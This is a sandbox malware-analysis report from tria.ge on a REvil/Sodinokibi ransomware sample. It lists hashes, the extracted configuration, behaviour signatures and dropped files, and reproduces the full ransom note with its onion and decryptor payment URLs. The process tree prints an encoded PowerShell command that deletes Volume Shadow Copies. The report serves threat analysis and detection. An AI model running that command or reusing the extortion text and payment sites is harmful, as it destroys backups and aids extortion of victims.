Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

2024-03-09...il.exe

windows7-x64

10

2024-03-09...il.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    09/03/2024, 22:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-03-09_e30ef3b089106a1c524824b05c8af086_revil.exe

  • Size

    123KB

  • MD5

    e30ef3b089106a1c524824b05c8af086

  • SHA1

    c4528054e0051fd8c337be43bb93d6c2ec94c51b

  • SHA256

    2437818086f564a597c703b42e8a4dd1aa25bbd22d20b7e734ca00a9b92f6103

  • SHA512

    c82c3cb77eec2e5ac9c2d977f7e22baab9e710b6dcad160f79078eb38c3d4f70ec3f86f44fffb45da68d9409d615b1e66d643d08c7aa763f350709cac931a4a8

  • SSDEEP

    1536:7DvcP3LThpshw4s5OE8yNcYQp+2ZZICS4AIjnBR561lQVMr3IgmffEbjQFOxi:y4S4haNcYM8gnBR5uiV1UvQFOxi

Score
10/10
sodinokibi$2a$10$ctl6mpbcozzcr.aru3gxp.pcftg0jof6upmmrky0hc0o.x.alltz.4085persistenceransomware

Malware Config

Extracted

Family

sodinokibi

Botnet

$2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

Campaign

4085

Decoy

sandd.nl

digivod.de

southeasternacademyofprosthodontics.org

resortmtn.com

mdk-mediadesign.de

tetinfo.in

fayrecreations.com

ecpmedia.vn

physiofischer.de

highlinesouthasc.com

antenanavi.com

blog.solutionsarchitect.guru

deepsouthclothingcompany.com

coursio.com

quickyfunds.com

atmos-show.com

pawsuppetlovers.com

hokagestore.com

midmohandyman.com

mmgdouai.fr
Attributes
  • net

    true

  • pid

    $2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

  • prc

    sqbcoreservice

    dbsnmp

    mydesktopservice

    outlook

    ocomm

    excel

    mydesktopqos

    isqlplussvc

    onenote

    tbirdconfig

    msaccess

    encsvc

    infopath

    steam

    thebat

    agntsvc

    sql

    visio

    wordpad

    winword

    dbeng50

    powerpnt

    firefox

    xfssvccon

    mspub

    oracle

    thunderbird

    ocssd

    synctime

    ocautoupds

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    4085

  • svc

    memtas

    mepocs

    backup

    sophos

    sql

    svc$

    veeam

    vss

Extracted

Path

C:\Users\2zuun-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 2zuun. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2F130E343694881C 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/2F130E343694881C Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: w+ndQXaUWJXw5/X448pLEhRRIiTOxmtRLxI1I0Y4JYkTkWWBVsvtf9Z6tEE9ZigJ IzOm4n5o4BFndQKoNnviQ8FomIyAlffSaPBdteDyfwEDphKNmEcv6EgHnaKKE5Uc PI9GEFMWBhfIObR8vqq8BFCSSJggE1Mb9bYm7ff7hEbQellnBYBr3UKq7uh6k6m+ Iz0fly79y23/ER2XnV1x2013F9cOcdqA6jm6ZRN3bDf8mH34hYMecJUV8soKj9yg wP/zG9tbuOJGWsPF2vSHEKz0IhTcZvrX7bOIBpg3YK5eLWR094NQODxpZYvSeedS XSUa0hEpjHixr0i/sxL3PPOwQm08EGlDkuyBcrVdh/LWLuSZFCE0sAWF6Ytw3idj gGWLFkHUyRwQWKcLB0AMGk2+YcZEUMagF/QKP83vbbwOaL8cLhBFFPRy0SYjRDBO yYXiMCjSMSsWauGucS3aHw/RwELzh2tJ1gog+N5WGf4dXDYGmlN4o9UwCdOKW05P PKQsYc51nqgHJI+vBZ9yPX7nVkP6g2HDNkS6K+gmYh0b/hadSqsUN6sP9jt9apPL yBei0C3hG4N1eNnE/+NxXor8Rqp+Lfz253Swxe5jkSgXd3jDzrsAoB9e+4BvxFkJ hRojLoH/+1jmSKYYQYH8JOktKiUyL3esWwhmM7JV49hwQ65qMVLHbd+EM0uF1Cpd d4kXBWtEfekmhm0pdnk8/R6Z1WjjV+WYdRS5wPXxWe872sRbElrzIovyTeIHAkhv VOPbDBcvN32bd/S8M7Hd6i0P6qwJF1LFF91YqR2maqprINAwH0IZKuNpkcmJxYwx lq9IOVKHyDXIrpV6wHmk0MRhZycvAyVBFwmyD8olWXRBTsKXVvC4n9WAsxaAlk/J fZ6BuUCFRU70HOt0usiLhbDQKrE6GkyEnFTDaZj7hxXwDfcjb4wrBZS0Q9DHnzOA xfKU+zj8WC7JsG+ynGA400fTDNnoIKY6LUM+9VKbRIWYeF4TkpiZGiHA0jHesAI7 BV8+IoQ++R1z2UH8sh74Q4WJ17PgJo/hUcynV4qiJ/38Tv+fC1MssqNiO9x/lvLb xS29ALcuqc0Z6XeW59SB/JNeXTl0KxgTd7A5B6MTB4DwPWH/Hfn8yTUigsQHBX/H /QbKTLieE3y6hD6fe+StmUDx+CBuq6L4nvxWaoo/qCkN8QpsjN5Yw5vYYo/AVLTe zSGwn/ZqemCQuhJAfTJMbUsOH3ngap88fiZKNHz79z5+sl7lzgPx0KB/Mc4fRlAP hb1ljUwIhogiNwhY70XFmiIjK+aiO/eoSJlLKaaIkXUPx5uEMQ5AUDym8smOl9pH 5iQ0/3N771cpOHU3rzqeUg8SclZEXnuzZdfadOOS ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2F130E343694881C

http://decryptor.cc/2F130E343694881C

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 25 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-03-09_e30ef3b089106a1c524824b05c8af086_revil.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-03-09_e30ef3b089106a1c524824b05c8af086_revil.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2112
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2192
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2256
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2800

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\2zuun-readme.txt
      Filesize

      6KB

      MD5

      76cfc4ee207cdae8e92f377ac674a159

      SHA1

      b411f83fed34af510404fcfcc3d59a397b32d344

      SHA256

      9b275c0a71dd8534061ec936244dd0f24ac0bdf2bcaae3e49edc304297f6da3d

      SHA512

      f8e408bf75ced8421c5f4dc68979ef5fa5741369a9d0ba8fc1f618f324898ab65a375b0aa9cf5ce2db4726b1361a5e4403d6064402027df7acba2b825e703513

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      67KB

      MD5

      753df6889fd7410a2e9fe333da83a429

      SHA1

      3c425f16e8267186061dd48ac1c77c122962456e

      SHA256

      b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

      SHA512

      9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Cab672E.tmp
      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Tar7097.tmp
      Filesize

      175KB

      MD5

      dd73cead4b93366cf3465c8cd32e2796

      SHA1

      74546226dfe9ceb8184651e920d1dbfb432b314e

      SHA256

      a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

      SHA512

      ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

      Download Submit

    • C:\Windows\System32\catroot2\dberr.txt
      Filesize

      192KB

      MD5

      0aa46d5e20d6ebbf5a30d0ef808e5710

      SHA1

      b35d623eaaf6e27ebaa56073b7a33c86268952e2

      SHA256

      6493b420e19339c927de6d70491f9ad4d877cedaa085d626460025699c122712

      SHA512

      b330ee787534cb378f2c19cc82dde41565a807f00132c048d69b6ead9ecd07a00cb5e257052d67d9952cb1b987a7fea350c570a7b980a1322803506fa8c17a35

      Download Submit

    • memory/2112-0-0x0000000001160000-0x0000000001182000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2112-446-0x0000000001160000-0x0000000001182000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2192-6-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2192-12-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2192-10-0x00000000028D0000-0x0000000002950000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2192-11-0x00000000028D0000-0x0000000002950000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2192-9-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2192-8-0x00000000028D0000-0x0000000002950000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2192-7-0x0000000001F70000-0x0000000001F78000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2192-5-0x000000001B6B0000-0x000000001B992000-memory.dmp

      Filesize

      2.9MB

      Download